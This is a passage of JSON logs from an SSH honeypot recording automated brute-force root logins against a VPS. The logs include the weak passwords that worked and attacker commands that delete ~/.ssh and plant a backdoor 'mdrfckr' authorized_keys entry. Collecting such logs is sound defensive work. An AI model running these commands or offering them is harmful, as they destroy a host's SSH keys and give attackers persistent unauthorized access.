fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:34:34.455442Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer123456","message":"login attempt [root/Qwer123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:34:34.985594Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:35.234509Z","src_ip":"43.156.132.147","session":"3bd80a7846f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:34:35.337435Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:34:35.338103Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:34:35.339283Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:35.480852Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:34:35.782711Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:34:35.783385Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:34:35.962791Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:35.963662Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":53222,"dst_ip":"1.2.3.4","dst_port":22,"session":"88769bc16cb9","protocol":"ssh","message":"New connection: 5.202.105.236:53222 (1.2.3.4:22) [session: 88769bc16cb9]","sensor":"my-vps","timestamp":"2025-09-09T00:34:36.061055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:34:36.090649Z","src_ip":"5.202.105.236","session":"88769bc16cb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:34:36.238848Z","src_ip":"5.202.105.236","session":"88769bc16cb9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:34:36.812253Z","src_ip":"5.202.105.236","session":"88769bc16cb9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:37.968202Z","src_ip":"5.202.105.236","session":"88769bc16cb9"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":53710,"dst_ip":"1.2.3.4","dst_port":22,"session":"83ae015db4f1","protocol":"ssh","message":"New connection: 5.202.105.236:53710 (1.2.3.4:22) [session: 83ae015db4f1]","sensor":"my-vps","timestamp":"2025-09-09T00:34:38.074099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:34:38.089886Z","src_ip":"5.202.105.236","session":"83ae015db4f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:34:38.233098Z","src_ip":"5.202.105.236","session":"83ae015db4f1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:34:38.863510Z","src_ip":"5.202.105.236","session":"83ae015db4f1"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:38.984730Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:39.012483Z","src_ip":"5.202.105.236","session":"83ae015db4f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58942,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec5177c693e1","protocol":"ssh","message":"New connection: 212.227.235.229:58942 (1.2.3.4:22) [session: ec5177c693e1]","sensor":"my-vps","timestamp":"2025-09-09T00:34:41.369804Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x90\u000b\\xa7G\u00054Q\\xe2D7/\\xfe\\xa2\\xc9=\\xee\\x8b:\\xb20\\x8do\\x84\\xbf\\xb5c\u0003\\xa7P,\\xa5\\xa6\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x90\u000b\\xa7G\u00054Q\\xe2D7/\\xfe\\xa2\\xc9=\\xee\\x8b:\\xb20\\x8do\\x84\\xbf\\xb5c\u0003\\xa7P,\\xa5\\xa6\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-09T00:34:41.370475Z","src_ip":"212.227.235.229","session":"ec5177c693e1"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:41.371359Z","src_ip":"212.227.235.229","session":"ec5177c693e1"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:50.580154Z","src_ip":"212.227.125.160","session":"7a79a02930e1"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":39194,"dst_ip":"1.2.3.4","dst_port":22,"session":"c94de4abcc83","protocol":"ssh","message":"New connection: 103.100.209.195:39194 (1.2.3.4:22) [session: c94de4abcc83]","sensor":"my-vps","timestamp":"2025-09-09T00:35:00.501373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:35:00.509312Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:35:00.711845Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.login.success","username":"root","password":"ABcd@1234","message":"login attempt [root/ABcd@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:35:01.532734Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:35:02.040328Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:35:02.041433Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:35:02.043088Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:02.249517Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:35:02.684142Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:35:02.685743Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:35:02.900034Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:02.901002Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":39754,"dst_ip":"1.2.3.4","dst_port":22,"session":"7326f4e317d0","protocol":"ssh","message":"New connection: 103.100.209.195:39754 (1.2.3.4:22) [session: 7326f4e317d0]","sensor":"my-vps","timestamp":"2025-09-09T00:35:03.111947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:35:03.115188Z","src_ip":"103.100.209.195","session":"7326f4e317d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:35:03.320024Z","src_ip":"103.100.209.195","session":"7326f4e317d0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:35:04.157335Z","src_ip":"103.100.209.195","session":"7326f4e317d0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:05.365957Z","src_ip":"103.100.209.195","session":"7326f4e317d0"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":40351,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc546f566dfd","protocol":"ssh","message":"New connection: 103.100.209.195:40351 (1.2.3.4:22) [session: fc546f566dfd]","sensor":"my-vps","timestamp":"2025-09-09T00:35:05.553486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:35:05.561161Z","src_ip":"103.100.209.195","session":"fc546f566dfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:35:05.757794Z","src_ip":"103.100.209.195","session":"fc546f566dfd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:35:06.550189Z","src_ip":"103.100.209.195","session":"fc546f566dfd"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:06.750108Z","src_ip":"103.100.209.195","session":"c94de4abcc83"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:06.751324Z","src_ip":"103.100.209.195","session":"fc546f566dfd"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":41704,"dst_ip":"1.2.3.4","dst_port":22,"session":"96adb226b8cd","protocol":"ssh","message":"New connection: 152.32.129.236:41704 (1.2.3.4:22) [session: 96adb226b8cd]","sensor":"my-vps","timestamp":"2025-09-09T00:35:08.239586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:35:08.242199Z","src_ip":"152.32.129.236","session":"96adb226b8cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:35:08.496885Z","src_ip":"152.32.129.236","session":"96adb226b8cd"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"12345678","message":"login attempt [nginx/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T00:35:09.557101Z","src_ip":"152.32.129.236","session":"96adb226b8cd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:10.813907Z","src_ip":"152.32.129.236","session":"96adb226b8cd"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":44312,"dst_ip":"1.2.3.4","dst_port":22,"session":"15acbdf67ddb","protocol":"ssh","message":"New connection: 43.156.132.147:44312 (1.2.3.4:22) [session: 15acbdf67ddb]","sensor":"my-vps","timestamp":"2025-09-09T00:35:40.593388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:35:40.594292Z","src_ip":"43.156.132.147","session":"15acbdf67ddb"}
